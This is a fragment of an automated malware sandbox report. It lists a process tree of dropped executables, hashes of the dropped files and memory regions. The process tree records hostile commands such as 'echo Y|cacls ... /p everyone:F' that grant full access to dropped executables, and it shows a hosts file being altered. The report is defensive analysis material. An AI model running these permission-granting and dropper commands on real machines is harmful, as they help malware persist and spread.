                                                      cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
                                                      2⤵
                                                        PID:2924
                                                    • C:\Windows\system32\cmd.EXE
                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
                                                      1⤵
                                                        PID:1580
                                                        • C:\Windows\ime\pnreyic.exe
                                                          C:\Windows\ime\pnreyic.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2380
                                                      • C:\Windows\system32\cmd.EXE
                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
                                                        1⤵
                                                          PID:528
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            2⤵
                                                              PID:3604
                                                            • C:\Windows\system32\cacls.exe
                                                              cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
                                                              2⤵
                                                                PID:4264
                                                            • C:\Windows\system32\cmd.EXE
                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
                                                              1⤵
                                                                PID:5968
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                  2⤵
                                                                    PID:3044
                                                                  • C:\Windows\system32\cacls.exe
                                                                    cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
                                                                    2⤵
                                                                      PID:1468

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Windows\SysWOW64\Packet.dll

                                                                    Filesize

                                                                    95KB

                                                                    MD5

                                                                    86316be34481c1ed5b792169312673fd

                                                                    SHA1

                                                                    6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                    SHA256

                                                                    49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                    SHA512

                                                                    3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                  • C:\Windows\SysWOW64\wpcap.dll

                                                                    Filesize

                                                                    275KB

                                                                    MD5

                                                                    4633b298d57014627831ccac89a2c50b

                                                                    SHA1

                                                                    e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                    SHA256

                                                                    b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                    SHA512

                                                                    29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                  • C:\Windows\TEMP\gcettrccj\config.json

                                                                    Filesize

                                                                    693B

                                                                    MD5

                                                                    f2d396833af4aea7b9afde89593ca56e

                                                                    SHA1

                                                                    08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                    SHA256

                                                                    d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                    SHA512

                                                                    2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                  • C:\Windows\TEMP\nblmptktz\2204.dmp

                                                                    Filesize

                                                                    4.1MB

                                                                    MD5

                                                                    5c739796efce111961fff93ce62453dc

                                                                    SHA1

                                                                    e74b12c2b872ce89b2b619f01d0678c73922a75c

                                                                    SHA256

                                                                    a462f11fa7017fa0fbe7a1183d588db0a8d685fa2b2ef150a244b01aefa45a60

                                                                    SHA512

                                                                    d20b07d777aa1666099974808a011edc8bcab639fbbd5474137b2d82d062fd70030d15f63cd7e5bce4dad4592f058c7e45f497418fc23641244f709f91576c59

                                                                  • C:\Windows\TEMP\nblmptktz\2572.dmp

                                                                    Filesize

                                                                    3.9MB

                                                                    MD5

                                                                    670f6624b45fb3c3d139870e2a7a5067

                                                                    SHA1

                                                                    f75bf844628de8c5290ed5a4d61049c226a2f5dd

                                                                    SHA256

                                                                    5657e1b77bb930d748feecb313c6aec253ea645cc9b31742c55c5fe51df2d85b

                                                                    SHA512

                                                                    5f24f875fd69d8059dedaa9e8099942719bf1e2b445d5b62d147ec0cd8ce51763d8a24f4c7a746f7b632c5ac8ee48443aecd5fe41e5ffce0af4e4ea618f7992b

                                                                  • C:\Windows\TEMP\nblmptktz\2768.dmp

                                                                    Filesize

                                                                    7.4MB

                                                                    MD5

                                                                    8c97a634e82b9b5d1d09ff45bddcaf15

                                                                    SHA1

                                                                    bad8612d3e63445a15697f8b991d08bfd12cc459

                                                                    SHA256

                                                                    e02511a7640a2a0e15acb2fb68fd9686ec149b4349871ddd7c2abe52813ed5af

                                                                    SHA512

                                                                    b0a5e9586a7e83c8bcf87d2ca28cf16d2d889a4f15be04b5c8ec238fae794f05b34ba64f7b8d9dc0d2cb5b3cf7e89f53f3f52ff92572c415e92af0f4c6fffc34

                                                                  • C:\Windows\TEMP\nblmptktz\2936.dmp

                                                                    Filesize

                                                                    2.9MB

                                                                    MD5

                                                                    368d1dbf8f2dc137748112a5c8e3f645

                                                                    SHA1

                                                                    7a1e56c4fe19b1001ed36e4455a69e73e3d0dbad

                                                                    SHA256

                                                                    807fc7b7023c6cf13c053c418dc6ba515e3e88948341f7f995e5d8bbcf418d3e

                                                                    SHA512

                                                                    0197d7c3aab12f4cb757a52ff1c41727088803569c432aacbc856af1e38a7e3ca12f89ce0765e97e4e4924d6ebf67f534781b112190d5e426fd71afcab1f9402

                                                                  • C:\Windows\TEMP\nblmptktz\2980.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                    MD5

                                                                    806538d1b7af46cfba31aa9b9ef5843a

                                                                    SHA1

                                                                    6169dcb08658f3910958380f994377ca09dd3a7b

                                                                    SHA256

                                                                    908f6c162aaa71f8b5e3816e7324ec5e986a28ed62aa228e83f8f2b27bf7b8db

                                                                    SHA512

                                                                    54f55a3698bb0510b152a382c3c4546b2e10e7c3a61af9f0b6ca0be89ee5bb62ba1394d85255140f8fcac464550cc66e598948e4781431c6102d3d284773cb6f

                                                                  • C:\Windows\TEMP\nblmptktz\316.dmp

                                                                    Filesize

                                                                    33.4MB

                                                                    MD5

                                                                    9b96dba1c3a46090f209dfab33ab70a2

                                                                    SHA1

                                                                    73891d76b3d645b2384539e27178295884e1cc32

                                                                    SHA256

                                                                    c3b128df087b9e22bbf7d984e35ab5853055bf9ee00825b01e81aeb58ac8ec2e

                                                                    SHA512

                                                                    27f3255ac0a1377528fcac20573c021e6a5b609340a03e30474629327ee1c46a8743d5ff88fb3dc96b4517edc0dea8c908afa63d16e673ae8068dfd0bbfb9d47

                                                                  • C:\Windows\TEMP\nblmptktz\3312.dmp

                                                                    Filesize

                                                                    2.9MB

                                                                    MD5

                                                                    7c9e2269d30fc5cbd644884d40b3236c

                                                                    SHA1

                                                                    ffc503c09c62bf7a97194e6b0da1cd386755b3ee

                                                                    SHA256

                                                                    6bde479143965593fad88bc7f8360a22ff47a68d63576224c752976307563dec

                                                                    SHA512

                                                                    763311cac1a5cd3fb06356247d2492492ecb662550cd018f70903c25564e55b80dfd0fb0927aa95eb3a26d42a8f580ea285e26096fdf2d9bb39e80a5047327da

                                                                  • C:\Windows\TEMP\nblmptktz\3708.dmp

                                                                    Filesize

                                                                    2.2MB

                                                                    MD5

                                                                    c2cb055ffd563ffce01c460677bf7275

                                                                    SHA1

                                                                    ab2d00ad419cf92eb0866f132082b08f883814ac

                                                                    SHA256

                                                                    15bf879db7c2ee056627514db2b8e93d17ba01766b864539a21f8f39e6b01aa3

                                                                    SHA512

                                                                    4252eaf9553cdcb0a99b4e38bcae0ba9e08e9c214768b86b9646c7623b089b8bb6faabdbb86c3f8f24a79e18b8aa6d1632ef349924f412ba63c6a19e6b99b2ba

                                                                  • C:\Windows\TEMP\nblmptktz\3800.dmp

                                                                    Filesize

                                                                    21.0MB

                                                                    MD5

                                                                    87635ba9b35e850e91629e7a8e056e98

                                                                    SHA1

                                                                    40e74c46de94649de262bb5af8ab9d58445d2776

                                                                    SHA256

                                                                    d1aa9f9834afb64374d656da1ee1cc3160d5e3f7a6c26648ea2ccb0cb3d3c5b7

                                                                    SHA512

                                                                    edbcdc73040c8cb14b95853511c06814de37bbd99ccea2ddea675612d86517cf7ca21505bb607f50a822d0011ae8b4d47bcbea3a86fef6ac9a4fa2893d949912

                                                                  • C:\Windows\TEMP\nblmptktz\3864.dmp

                                                                    Filesize

                                                                    4.3MB

                                                                    MD5

                                                                    0f24b4ddffdb714b97e3bb880ac3c4b6

                                                                    SHA1

                                                                    52e39d8609c51ce3f6cfcb1e2626a57ccb10e164

                                                                    SHA256

                                                                    53e9321eb066c2b9021b2e744528f3211e2561fddfb514e53edc4138054ec431

                                                                    SHA512

                                                                    f71484b43b894998eb311c04f646437e208f91716ff28bd213b60057e10ed3afbf4e62fcac7d632366ab6fc476b4cc46585ce69ce18834879a087f469bdf1c1a

                                                                  • C:\Windows\TEMP\nblmptktz\3948.dmp

                                                                    Filesize

                                                                    44.1MB

                                                                    MD5

                                                                    8893f4789b13d9343c87b2d2205dfa76

                                                                    SHA1

                                                                    7524f3e604bcb23cb6d050db4596daa1a6b4fcf9

                                                                    SHA256

                                                                    a632de2c95de43d39993855e3f289b985d4699f8b773457993067afb08af8ebc

                                                                    SHA512

                                                                    b4a3058235c1ef0f55fde1968c127f13e5f25eaf5b586fbaf5ef9ae4f9ab02296a69abfe29f7fe57da7333bcd6d105879460ac660b6e9594c6a5db472ec76ae2

                                                                  • C:\Windows\TEMP\nblmptktz\4288.dmp

                                                                    Filesize

                                                                    25.9MB

                                                                    MD5

                                                                    4d3407262eb020e55f8c2b50d65b8d8d

                                                                    SHA1

                                                                    20e448ede17e54fb34c98c74a7bc40276a615f0e

                                                                    SHA256

                                                                    7a2e16e28dc6b655b277ffc814ca4247af1f0819c52ed57e3309ac6fd832e9e9

                                                                    SHA512

                                                                    0afc42677b3baf5d62fa7fa55ff67b8a25f4d7f2e7b91a152388428aa32abb2fdd0d8c71a13c4e7f910adc0551e8427e7a4dcba3b388fc6ee98657ed4dbe5ec4

                                                                  • C:\Windows\TEMP\nblmptktz\4548.dmp

                                                                    Filesize

                                                                    8.7MB

                                                                    MD5

                                                                    21b4cf142604dc23c20e68ff9ae23376

                                                                    SHA1

                                                                    926f93c5020d30237e7e5cb473de8a7c705bb62c

                                                                    SHA256

                                                                    5e09cc9429b09bcec1c4ce8e7e303d7a6e203a4baaf90ff8954d51b908598450

                                                                    SHA512

                                                                    304df4fc91e4913238b6e8da08a5a4c0b9444d890011f5ed9f8b644ec4a44a6f2b2273069e496201d9f8c7875aa1e503e9f320cb05ef8f5f4516bee7eb003b97

                                                                  • C:\Windows\TEMP\nblmptktz\776.dmp

                                                                    Filesize

                                                                    826KB

                                                                    MD5

                                                                    7b11561a4ddfceb4375bd65261056441

                                                                    SHA1

                                                                    f15d1ddf1587f2ce1da59aa884a898ef8f9638ee

                                                                    SHA256

                                                                    bd59533d7a9544f1ef8ead68033097ae40468b6928599e45744412a6832edb09

                                                                    SHA512

                                                                    502c1dfacf4f45068922b42ce443c46e591faaf3304a7914299f2cc0480c020ee1f8dad0abbd4706dc5e54a13f7cc59910df75f5ef727b51809d7dc56387b2e5

                                                                  • C:\Windows\TEMP\nblmptktz\800.dmp

                                                                    Filesize

                                                                    1019KB

                                                                    MD5

                                                                    400e4e90dadad5c1be79dc96348178a1

                                                                    SHA1

                                                                    998f977a8be1feaf9ee18c124087de9f2d52b035

                                                                    SHA256

                                                                    4705d910c8b87f53054b8255d0e5781b00a27f09ab3a8df0d9d2f08b4ee77cb1

                                                                    SHA512

                                                                    f98fea352e0660ee77d0b68445bc3084a4c0a01952add713472822872a1c3aa38949b948e6c6aff8c60a1578cb696d20c6a3e655f8bc8725cc0d704004ca2192

                                                                  • C:\Windows\Temp\gcettrccj\zergmt.exe

                                                                    Filesize

                                                                    343KB

                                                                    MD5

                                                                    2b4ac7b362261cb3f6f9583751708064

                                                                    SHA1

                                                                    b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                    SHA256

                                                                    a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                    SHA512

                                                                    c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                  • C:\Windows\Temp\nblmptktz\cntrtrctt.exe

                                                                    Filesize

                                                                    126KB

                                                                    MD5

                                                                    e8d45731654929413d79b3818d6a5011

                                                                    SHA1

                                                                    23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                    SHA256

                                                                    a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                    SHA512

                                                                    df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                  • C:\Windows\Temp\nsxCC89.tmp\System.dll

                                                                    Filesize

                                                                    11KB

                                                                    MD5

                                                                    2ae993a2ffec0c137eb51c8832691bcb

                                                                    SHA1

                                                                    98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                    SHA256

                                                                    681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                    SHA512

                                                                    2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                  • C:\Windows\Temp\nsxCC89.tmp\nsExec.dll

                                                                    Filesize

                                                                    6KB

                                                                    MD5

                                                                    b648c78981c02c434d6a04d4422a6198

                                                                    SHA1

                                                                    74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                    SHA256

                                                                    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                    SHA512

                                                                    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                  • C:\Windows\Temp\xohudmc.exe

                                                                    Filesize

                                                                    72KB

                                                                    MD5

                                                                    cbefa7108d0cf4186cdf3a82d6db80cd

                                                                    SHA1

                                                                    73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                    SHA256

                                                                    7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                    SHA512

                                                                    b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                  • C:\Windows\hrmeszcf\pnreyic.exe

                                                                    Filesize

                                                                    7.1MB

                                                                    MD5

                                                                    e0ffea834453d866ccb467207abba945

                                                                    SHA1

                                                                    6ecf940edf8c247a1a77e0c3fe9c9a590b7e339c

                                                                    SHA256

                                                                    bed2eab3abc7f9f489f1dab3beed5429e5befb8eb390ff8e5a237f7027b74255

                                                                    SHA512

                                                                    7aa0050300cef6cc25bb64ec27912a93e6882cd74a7bb621a4a5ca320718fdcf1a1f7d512db9125fe75209016a7a0b96742961796259e24d1dde65c658147b9c

                                                                  • C:\Windows\nblmptktz\Corporate\vfshost.exe

                                                                    Filesize

                                                                    381KB

                                                                    MD5

                                                                    fd5efccde59e94eec8bb2735aa577b2b

                                                                    SHA1

                                                                    51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                    SHA256

                                                                    441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                    SHA512

                                                                    74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    f1cb318fa2fc7accbba0bdc4c8829d7f

                                                                    SHA1

                                                                    e08462ab21f479f779d499fcd4435685b73c5847

                                                                    SHA256

                                                                    61805221edc023617b96490e7fc89ae7ecad264656d7771626cb16d17528d13d

                                                                    SHA512

                                                                    ebe8ac121f0e960eb4decd57d9b0e774ac1a49160fd814b54a602b545c00909fca495b3b45b4bd20947e9ae81d7d0a614a45bc8a31b63a57c089a151f567b08d

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    2f74e6300af3b16ee47fb8dd29c3b45c

                                                                    SHA1

                                                                    5848b7e8ccb163545e38fb2146f1b4fc7216a429

                                                                    SHA256

                                                                    491b378483e6c52827cb676a8e001fb03587015a5e8c16d28f1fff56a02760b6

                                                                    SHA512

                                                                    473e7100a53986fb649005e7ff0a824d534861dc7ff63c0c0dc668a15981118b30f407d64b5aae2e90d727a3db949837dade11a3fd443820fa807ae3dbef546b

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    d38760ac6b6bfd3e9161b7c4c51c5e9a

                                                                    SHA1

                                                                    5238aeabd31e8add99c6e2ba70593d83034659a0

                                                                    SHA256

                                                                    05cdda0b01aa0cd18893b6741e720814d052d14015fbec4b2a877e7710b45a72

                                                                    SHA512

                                                                    5e43ad420cb14cb6435292dea0956f7ea9dd9615cdb5d7801d71b80b8cad0978c33179e24d0ebba1eab978f85663d441751670371c2224231488d84428e631ae

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    e98b53863f15715d891eedd80655f285

                                                                    SHA1

                                                                    693180c583200a9f188588cc8ff5bb01eaa92092

                                                                    SHA256

                                                                    4ea18f3843127d28fa002bf4d67a9289bf597f378acb232ec47ea6c018cd4110

                                                                    SHA512

                                                                    cce11a6c8a6b28c7a5857464981b95fac6e7f034df706510b2175f4a71b8acefa533649a605dc7784928cffe527bd19d0ea29662f17ccfe096c4ab7e6a55f623

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    a527a92683bd9bfadfb44cee72b4a1be

                                                                    SHA1

                                                                    dc3d7bd4763a355148b0e15c06ec344d8a0fcb01

                                                                    SHA256

                                                                    6d7efa1532a4b22430289097e3351eecd4054786462605bdfff0209d2f1258e9

                                                                    SHA512

                                                                    8d8efd2ac663ad34185d8ad463015d57149c3f777f9fb505a952ca01cf022bb41449904b34787c0d7a2e1c133535e8ae391b2481649f5eebf57edcb1c3907ce4

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    659623de24bc27f4fc7276c035c5f5e8

                                                                    SHA1

                                                                    7c3c13bf98137a093369058054f480d505064941

                                                                    SHA256

                                                                    96248f3a64c195f9bbbf3aec79c47c6c452e2a2c15f6f1103f131d1e07f4453d

                                                                    SHA512

                                                                    c5365b45cf05a554af65d3172a43ed43e74109da3a1a30b7d07bc70e3e5cf837d516e0c4070b94a38f90ef2a464af65c14b804d5679cec67671231f5bbd48573

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    58fc4591f774cca074fc5a4397c467e9

                                                                    SHA1

                                                                    6e38eeb5bae32cba608fe7492d0d78603031b764

                                                                    SHA256

                                                                    bc8eb8b43fc29fbf2e03994377e64ac3ee3bb1c6eed2b52578f019c403dc8239

                                                                    SHA512

                                                                    2c9266d1cbefeb898582a3f34377062944f1c24b12579e98bb1ed6035c268edb4397ed21b0034bb333b06be73eca35ad8661ee507d26bb3d62fb01644c7a0120

                                                                  • C:\Windows\nblmptktz\etgfqftjv\Result.txt

                                                                    Filesize

                                                                    4KB

                                                                    MD5

                                                                    b5b7672007ea685aefdc1fd49edeffaf

                                                                    SHA1

                                                                    8bd6edb60648a2886c640d0206d5e1c47d2d4d2e

                                                                    SHA256

                                                                    33a11e061f6283d0e5e9bc70a9006f1fd71d078faba379a5150c7a65c7006b49

                                                                    SHA512

                                                                    ef22df9352b7e67a1b2e4bcac1e970eab784bb4b25533e714379449cae03befbebd425eb8a3dad5773fa308bd3320dfe7bccdbfa146c8dfbc1a8d7380bacecf1

                                                                  • C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe

                                                                    Filesize

                                                                    332KB

                                                                    MD5

                                                                    ea774c81fe7b5d9708caa278cf3f3c68

                                                                    SHA1

                                                                    fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                    SHA256

                                                                    4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                    SHA512

                                                                    7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                  • C:\Windows\nblmptktz\etgfqftjv\wpcap.exe

                                                                    Filesize

                                                                    424KB

                                                                    MD5

                                                                    e9c001647c67e12666f27f9984778ad6

                                                                    SHA1

                                                                    51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                    SHA256

                                                                    7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                    SHA512

                                                                    56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                  • C:\Windows\system32\drivers\etc\hosts

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    c838e174298c403c2bbdf3cb4bdbb597

                                                                    SHA1

                                                                    70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                    SHA256

                                                                    1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                    SHA512

                                                                    c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                  • memory/32-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/32-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/224-756-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-497-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-500-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-498-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-199-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-238-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-221-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-755-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-167-0x000001922D510000-0x000001922D520000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/224-233-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-182-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-212-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-164-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/224-178-0x00007FF60D9B0000-0x00007FF60DAD0000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/652-206-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/936-180-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/1016-224-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/1064-235-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/1160-175-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/1604-197-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/1692-78-0x00000000012B0000-0x00000000012FC000-memory.dmp

                                                                    Filesize

                                                                    304KB

                                                                  • memory/1740-215-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/2036-248-0x0000000000710000-0x0000000000722000-memory.dmp

                                                                    Filesize

                                                                    72KB

                                                                  • memory/2332-202-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/2616-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/2792-228-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/2956-136-0x00007FF6D40A0000-0x00007FF6D418E000-memory.dmp

                                                                    Filesize

                                                                    952KB

                                                                  • memory/2956-138-0x00007FF6D40A0000-0x00007FF6D418E000-memory.dmp

                                                                    Filesize

                                                                    952KB

                                                                  • memory/2968-193-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/2972-171-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/3600-232-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/3912-185-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/4068-210-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/4472-146-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/4472-142-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/4816-189-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/4876-219-0x00007FF6D24E0000-0x00007FF6D253B000-memory.dmp

                                                                    Filesize

                                                                    364KB

                                                                  • memory/5060-169-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                    Filesize

                                                                    72KB

                                                                  • memory/5060-152-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                    Filesize

                                                                    32KB